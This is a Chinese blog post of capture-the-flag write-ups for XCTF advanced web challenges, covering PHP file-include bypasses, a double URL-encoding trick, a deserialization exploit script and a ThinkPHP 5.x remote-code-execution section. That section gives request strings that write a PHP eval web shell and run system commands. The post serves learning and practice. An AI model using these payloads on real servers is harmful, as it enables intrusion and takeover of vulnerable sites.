<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>攻防世界-进阶区 | Alloc</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
    <meta name="description" content="正经人谁写日记啊">
  
  
  
    <link rel="alternate" href="/atom.xml" title="Alloc" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
    
<link rel="stylesheet" href="/localshare/css/share.css">

  
  
    
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Alloc</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        
          <a class="main-nav-link" href="/."><i class="fa fa-home"></i> 首页</a>
        
          <a class="main-nav-link" href="/archives/"><i class="fa fa-archive"></i> 归档</a>
        
          <a class="main-nav-link" href="/about/"><i class="fa fa-user"></i> 关于</a>
        
          <a class="main-nav-link" href="/atom.xml"><i class="fa fa-rss"></i> 订阅</a>
        
      </nav>
    </div>
    <div id="search-form">
      <div id="result-mask" class="hide"></div>
      <label><input id="search-key" type="text" autocomplete="off" placeholder="搜索"></label>
      <div id="result-wrap" class="hide">
        <div id="search-result"></div>
      </div>
      <div class="hide">
        <template id="search-tpl">
          <div class="item">
            <a href="/{path}" title="{title}">
              <div class="title">{title}</div>
              <div class="time">{date}</div>
              <div class="tags">{tags}</div>
            </a>
          </div>
        </template>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-攻防世界-进阶区" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      攻防世界-进阶区
    </h1>
  


      </header>
    
    <div class="article-meta">
      
      <span class="article-date">
  <i class="fa fa-date"></i>
  <time class="dt-published" datetime="2022-01-13T03:04:13.000Z" itemprop="datePublished">2022年01月13日</time>
</span>
      
      
        <span class="article-views">
  <i class="fa fa-views"></i>
  <i id="busuanzi_container_page_pv">
      <i id="busuanzi_value_page_pv"></i>
  </i>
</span>

      
      
<a href="/2022/01/13/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-%E8%BF%9B%E9%98%B6%E5%8C%BA/#comments" class="article-comment-link">
  
    
    
    
    
    
  
  <i class="fa fa-commt"></i>
  留言
</a>


    </div>
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><b>攻防世界-进阶区 部分习题 正在进行</b></p>
<h3 id="baby-web"><a href="#baby-web" class="headerlink" title="baby_web"></a>baby_web</h3><p>题目描述：想想初始页面是哪个</p>
<p>index.php</p>
<p>结果<b>跳转</b>到1.php</p>
<p>用fiddler查看index.php，得到flag</p>
<h3 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h3><p>题目描述：一张滑稽图片</p>
<p>查看源码，有source.php提示<br>查看source.php,有hint.php提示<br>查看hint.php，有ffffllllaaaagggg提示   表明 flag 在这个文件中，且这个文件名暗示要使用四层目录<br>查看source.php</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php
    highlight_file<span class="token punctuation">(</span>__FILE__<span class="token punctuation">)</span><span class="token punctuation">;</span>
    class emmm
    <span class="token punctuation">&#123;</span>
        public static <span class="token keyword">function</span> checkFile<span class="token punctuation">(</span><span class="token operator">&amp;</span><span class="token variable">$page</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#123;</span>
            <span class="token variable">$whitelist</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">"source"</span><span class="token operator">=</span><span class="token operator">></span><span class="token string">"source.php"</span>,<span class="token string">"hint"</span><span class="token operator">=</span><span class="token operator">></span><span class="token string">"hint.php"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span> isset<span class="token punctuation">(</span><span class="token variable">$page</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token operator">!</span>is_string<span class="token punctuation">(</span><span class="token variable">$page</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span>
                <span class="token builtin class-name">echo</span> <span class="token string">"you can't see it"</span><span class="token punctuation">;</span>
                <span class="token builtin class-name">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>

            <span class="token keyword">if</span> <span class="token punctuation">(</span>in_array<span class="token punctuation">(</span><span class="token variable">$page</span>, <span class="token variable">$whitelist</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span>
                <span class="token builtin class-name">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>

            <span class="token variable">$_page</span> <span class="token operator">=</span> mb_substr<span class="token punctuation">(</span>
                <span class="token variable">$page</span>,
                <span class="token number">0</span>,
                mb_strpos<span class="token punctuation">(</span><span class="token variable">$page</span> <span class="token builtin class-name">.</span> <span class="token string">'?'</span>, <span class="token string">'?'</span><span class="token punctuation">)</span>
            <span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span>in_array<span class="token punctuation">(</span><span class="token variable">$_page</span>, <span class="token variable">$whitelist</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span>
                <span class="token builtin class-name">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>

            <span class="token variable">$_page</span> <span class="token operator">=</span> urldecode<span class="token punctuation">(</span><span class="token variable">$page</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token variable">$_page</span> <span class="token operator">=</span> mb_substr<span class="token punctuation">(</span>
                <span class="token variable">$_page</span>,
                <span class="token number">0</span>,
                mb_strpos<span class="token punctuation">(</span><span class="token variable">$_page</span> <span class="token builtin class-name">.</span> <span class="token string">'?'</span>, <span class="token string">'?'</span><span class="token punctuation">)</span>
            <span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span>in_array<span class="token punctuation">(</span><span class="token variable">$_page</span>, <span class="token variable">$whitelist</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span>
                <span class="token builtin class-name">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token builtin class-name">echo</span> <span class="token string">"you can't see it"</span><span class="token punctuation">;</span>
            <span class="token builtin class-name">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span> empty<span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token operator">&amp;&amp;</span> is_string<span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token operator">&amp;&amp;</span> emmm::checkFile<span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        include <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token builtin class-name">exit</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        <span class="token builtin class-name">echo</span> <span class="token string">"&lt;br>&lt;img src=<span class="token entity" title="\&quot;">\"</span>https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg<span class="token entity" title="\&quot;">\"</span> />"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>  
?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>四个if语句：</p>
<p>第一个 if 语句对变量进行检验，要求$page为字符串，否则返回 false<br>第二个 if 语句判断$page是否存在于$whitelist数组中，存在则返回 true<br>第三个 if 语句，截取传进参数中首次出现?之前的部分，判断该部分是否存在于$whitelist数组中，，存在则返回 true<br>第四个 if 语句，先对构造的 payload 进行 url 解码，再截取传进参数中首次出现?之前的部分，并判断该部分是否存在于$whitelist中，存在则返回 true<br>以上四个满足一个即可返回 true，若均未满足，则返回 false</p>
<p>我们利用第三个 if 语句构造参数：<br>?file=source.php?/../../../../ffffllllaaaagggg<br>第一个?传参，第二个?用来满足截取</p>
<p>将?进行两次 url 编码，变为%253f，在服务器端提取参数时自动解码一次，checkFile函数中解码一次，仍会解码为?，可以绕过第四个 if ，但是实测只编码一次也可以得到 flag</p>
<h3 id="Training-WWW-Robots"><a href="#Training-WWW-Robots" class="headerlink" title="Training-WWW-Robots"></a>Training-WWW-Robots</h3><p>robots.txt<br>/fl0g.php</p>
<p>robots协议也叫robots.txt（统一小写）是一种存放于网站根目录下的ASCII编码的文本文件，它通常告诉网络搜索引擎的漫游器（又称网络蜘蛛），此网站中的哪些内容是不应被搜索引擎的漫游器获取的，哪些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的，所以robots.txt的文件名应统一为小写。robots.txt应放置于网站的根目录下。如果想单独定义搜索引擎的漫游器访问子目录时的行为，那么可以将自定的设置合并到根目录下的robots.txt，或者使用robots元数据（Metadata，又称元数据）。</p>
<h3 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h3><p>index.<b>phps</b><br>/?id=%2561dmin</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php
if<span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token operator">==</span><span class="token operator">=</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
  echo<span class="token punctuation">(</span><span class="token string">"&lt;p>not allowed!&lt;/p>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  exit<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span> <span class="token operator">=</span> urldecode<span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
if<span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token string">"admin"</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token builtin class-name">echo</span> <span class="token string">"&lt;p>Access granted!&lt;/p>"</span><span class="token punctuation">;</span>
  <span class="token builtin class-name">echo</span> <span class="token string">"&lt;p>Key: xxxxxxx &lt;/p>"</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>要使得”admin”===$_GET[id]不成立</p>
<p>经过$_GET[id] = urldecode($_GET[id]);，使得$_GET[id] == “admin”成立</p>
<p>urldecode/urlencode<br>当传入参数id时，浏览器在后面会对非ASCII码的字符进行一次urlencode<br>然后在这段代码中运行时，会自动进行一次urldecode<br>在urldecode()函数中，再一次进行一次解码<br>urldecode(%2561)=%61<br>urldecode(%61)=a<br>即，当第一次比较时，实际是<br>if(“admin”===”%61dmin”)<br>而经过<br>$_GET[id] = urldecode($_GET[id]);<br>第二次比较是：<br>if(“admin” == “admin”);</p>
<h3 id="Web-php-unserialize"><a href="#Web-php-unserialize" class="headerlink" title="Web_php_unserialize"></a>Web_php_unserialize</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php 
class Demo <span class="token punctuation">&#123;</span> 		<span class="token comment">#定义一个以Demo为名的类</span>
    private <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string">'index.php'</span><span class="token punctuation">;</span>			<span class="token comment">#给Demo类定义一个$file属性，并且赋值为index.php</span>
    public <span class="token keyword">function</span> __construct<span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 	<span class="token comment">#定义__construct()构造方法</span>
        <span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">=</span> <span class="token variable">$file</span><span class="token punctuation">;</span> 	<span class="token comment">#在调用对象之前，给$file属性初始化赋值</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-name function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 		<span class="token comment">#定义一个__destruct()析构方法</span>
        <span class="token builtin class-name">echo</span> @highlight_file<span class="token punctuation">(</span><span class="token variable">$this</span>-<span class="token operator">></span>file, <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">#在销毁对象之前，高亮打印出$file属性的源码</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-name function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 	<span class="token comment">#定义一个__wakeup()魔术方法</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">!=</span> <span class="token string">'index.php'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> <span class="token comment">#在对象反序列化的时候，判断$file属性的值是否为index.php</span>
            //the secret is <span class="token keyword">in</span> the fl4g.php	<span class="token comment">#提示flag在一个以fl4g.php为名的php文件里</span>
            <span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">=</span> <span class="token string">'index.php'</span><span class="token punctuation">;</span> 		<span class="token comment">#若$file属性不等于index.php，则赋值为index.php</span>
        <span class="token punctuation">&#125;</span> 
    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>isset<span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span> 		<span class="token comment">#判断客户端是否以GET形式传递$var参数到后台</span>
    <span class="token variable">$var</span> <span class="token operator">=</span> base64_decode<span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 	<span class="token comment">#若传递了，先经过base64解码一次</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>preg_match<span class="token punctuation">(</span><span class="token string">'/[oc]:\d+:/i'</span>, <span class="token variable">$var</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span> <span class="token comment">#解码后，判断是否匹配正则</span>
        die<span class="token punctuation">(</span><span class="token string">'stop hacking!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 		<span class="token comment">#若匹配正则，则退出，并且回应“stop hacking”</span>
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>						<span class="token comment">#若没有匹配正则，则反序列化$var属性</span>
        @unserialize<span class="token punctuation">(</span><span class="token variable">$var</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span> 		<span class="token comment">#若没有传递$var参数到后台,则高亮回显index.php的源码</span>
    highlight_file<span class="token punctuation">(</span><span class="token string">"index.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">&#125;</span> 
?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>思路：很明显，该段代码的关键点在于”echo @highlight_file(t h i s − &gt; f i l e , t r u e ) ; “ ， 对 的 ， 就 是 高 亮 打 印 this-&gt;file, true);”，对的，就是高亮打印this−&gt;file,true);”，对的，就是高亮打印file属性的值对应的源码的这句代码，那么如果打印了fl4g.php页面的源码，岂不是就得到了flag</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">要想打印fl4g.php页面的源码，就要满足两个条件：执行析构方法+<span class="token variable">$file</span>属性的值为fl4g.php
要想执行析构函数，就要满足的条件：对象销毁前
要想给<span class="token variable">$file</span>属性赋值为fl4g.php，就要满足的条件：绕过__wakeup<span class="token punctuation">(</span><span class="token punctuation">)</span>方法+绕过正则匹配
要想绕过__wakeup<span class="token punctuation">(</span><span class="token punctuation">)</span>方法，就要满足的条件：利用__wakeup<span class="token punctuation">(</span><span class="token punctuation">)</span>漏洞，修改序列化后的属性个数大于真实属性即可
要想绕过正则匹配，就要满足的条件：看的懂正则

分析正则：if <span class="token punctuation">(</span>preg_match<span class="token punctuation">(</span><span class="token string">'/[oc]:\d+:/i'</span>, <span class="token variable">$var</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span>oc<span class="token punctuation">]</span>  匹配o或者c
<span class="token punctuation">\</span>d    匹配任意一个10进制的数
+     匹配前面的字符 <span class="token number">1</span>-N 次
i     表示不区分大小写

测试该正则匹配：
<span class="token operator">&lt;</span>?php 
<span class="token variable">$var</span><span class="token operator">=</span><span class="token string">'O:4:"Demo":2:&#123;s:4:"flag";s:3:"111";&#125;'</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>preg_match<span class="token punctuation">(</span><span class="token string">'/[oc]:\d+:/i'</span>, <span class="token variable">$var</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span> 
        die<span class="token punctuation">(</span><span class="token string">'stop hacking!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 				
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>								
        <span class="token builtin class-name">echo</span> <span class="token string">'success'</span><span class="token punctuation">;</span>  
    <span class="token punctuation">&#125;</span> 
    <span class="token comment">#由于匹配到了O:4，所以退出程序</span>
?<span class="token operator">></span>
尝试绕过：
<span class="token operator">&lt;</span>?php 
<span class="token variable">$var</span><span class="token operator">=</span><span class="token string">'O:4:"Demo":2:&#123;s:4:"flag";s:3:"111";&#125;'</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>preg_match<span class="token punctuation">(</span><span class="token string">'/[oc]:\d+:/i'</span>, <span class="token variable">$var</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span> 
        die<span class="token punctuation">(</span><span class="token string">'stop hacking!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 				
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>								
        <span class="token builtin class-name">echo</span> <span class="token string">'success'</span><span class="token punctuation">;</span>  
    <span class="token punctuation">&#125;</span> 
	<span class="token comment">#由于我们把O:4改为了O:+4，那么就匹配不完全，则成功绕过正则匹配</span>
?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>编写代码</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php
class Demo <span class="token punctuation">&#123;</span>
    private <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string">'index.php'</span><span class="token punctuation">;</span>
    public <span class="token keyword">function</span> __construct<span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">=</span> <span class="token variable">$file</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-name function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token builtin class-name">echo</span> @highlight_file<span class="token punctuation">(</span><span class="token variable">$this</span>-<span class="token operator">></span>file, <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-name function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">!=</span> <span class="token string">'index.php'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            //the secret is <span class="token keyword">in</span> the fl4g.php
            <span class="token variable">$this</span>-<span class="token operator">></span>file <span class="token operator">=</span> <span class="token string">'index.php'</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$chen</span> <span class="token operator">=</span> new Demo<span class="token punctuation">(</span><span class="token string">'fl4g.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$chen</span> <span class="token operator">=</span> serialize<span class="token punctuation">(</span><span class="token variable">$chen</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token builtin class-name">echo</span> <span class="token variable">$chen</span><span class="token builtin class-name">.</span><span class="token string">"&lt;br/>"</span><span class="token punctuation">;</span>
<span class="token variable">$chen</span> <span class="token operator">=</span> str_replace<span class="token punctuation">(</span><span class="token string">'O:4'</span>,<span class="token string">'O:+4'</span>,<span class="token variable">$chen</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">#用+4替换成4是为了绕过preg_match()的正则匹配</span>
<span class="token builtin class-name">echo</span> <span class="token variable">$chen</span><span class="token builtin class-name">.</span><span class="token string">"&lt;br/>"</span><span class="token punctuation">;</span>
<span class="token variable">$chen</span> <span class="token operator">=</span> str_replace<span class="token punctuation">(</span><span class="token string">':1:'</span>,<span class="token string">':2:'</span>,<span class="token variable">$chen</span><span class="token punctuation">)</span><span class="token punctuation">;</span>		<span class="token comment">#绕过__wakeup()魔术方法</span>
<span class="token builtin class-name">echo</span> <span class="token variable">$chen</span><span class="token builtin class-name">.</span><span class="token string">"&lt;br/>"</span><span class="token punctuation">;</span>
<span class="token variable">$chen</span> <span class="token operator">=</span> base64_encode<span class="token punctuation">(</span><span class="token variable">$chen</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token builtin class-name">echo</span> <span class="token variable">$chen</span><span class="token builtin class-name">.</span><span class="token string">"&lt;br/>"</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><a target="_blank" rel="noopener" href="https://tool.lu/coderunner/">在线运行</a><br>get传入</p>
<h3 id="PHP-RCE"><a href="#PHP-RCE" class="headerlink" title="PHP_RCE"></a>PHP_RCE</h3><p>网页使用的是ThinkPHP框架<br>先查看版本号  在网址上随意输入一个不存在的模块地址<br>版本为5.1<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/backlion/p/10106676.html">漏洞成因</a><br>ThinkPHP5框架底层对控制器名过滤不严，可以通过url调用到ThinkPHP框架内部的敏感函数，进而导致getshell漏洞。</p>
<p>方法1：</p>
<p>file_put_contents写入shell<br>payload：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">s</span><span class="token operator">=</span>index/think<span class="token punctuation">\</span>app/invokefunction<span class="token operator">&amp;</span><span class="token assign-left variable">function</span><span class="token operator">=</span>call_user_func_array<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">=</span>phpinfo<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>成功执行命令，接下来直接写入shell：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">s</span><span class="token operator">=</span>index/think<span class="token punctuation">\</span>app/invokefunction<span class="token operator">&amp;</span><span class="token assign-left variable">function</span><span class="token operator">=</span>call_user_func_array<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">=</span>file_put_contents<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span>test.php<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token operator">&lt;</span>?php highlight_file<span class="token punctuation">(</span>__FILE__<span class="token punctuation">)</span><span class="token punctuation">;</span>@eval<span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span>sss<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>如果成功写入会返回文件的大小，尝试去访问该文件：<br>成功写入 shell，直接上<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/270488.html">蚁剑</a><br><img src="/2022/01/13/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-%E8%BF%9B%E9%98%B6%E5%8C%BA/php_rce.jpg"></p>
<p>方法2：</p>
<p>system查找flag</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">?s<span class="token operator">=</span>index/think<span class="token punctuation">\</span>app/invokefunction<span class="token operator">&amp;</span><span class="token assign-left variable">function</span><span class="token operator">=</span>call_user_func_array<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">=</span>system<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span>find%20/%20-name%20%22flag%22<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看flag</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">?s<span class="token operator">=</span>index/think<span class="token punctuation">\</span>app/invokefunction<span class="token operator">&amp;</span><span class="token assign-left variable">function</span><span class="token operator">=</span>call_user_func_array<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">=</span>system<span class="token operator">&amp;</span>vars<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span>cat%20/flag<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="Web-php-include"><a href="#Web-php-include" class="headerlink" title="Web_php_include"></a>Web_php_include</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php
show_source<span class="token punctuation">(</span>__FILE__<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token builtin class-name">echo</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'hello'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$page</span><span class="token operator">=</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'page'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">while</span> <span class="token punctuation">(</span>strstr<span class="token punctuation">(</span><span class="token variable">$page</span>, <span class="token string">"php://"</span><span class="token punctuation">))</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$page</span><span class="token operator">=</span>str_replace<span class="token punctuation">(</span><span class="token string">"php://"</span>, <span class="token string">""</span>, <span class="token variable">$page</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
include<span class="token punctuation">(</span><span class="token variable">$page</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>strstr()函数对php协议进行了过滤</p>
<p>方法一：data://协议绕过</p>
<p>data协议的一般格式<br>?page=data://text/plain,xxxxxxx  (xxxxxx为要执行的命令）</p>
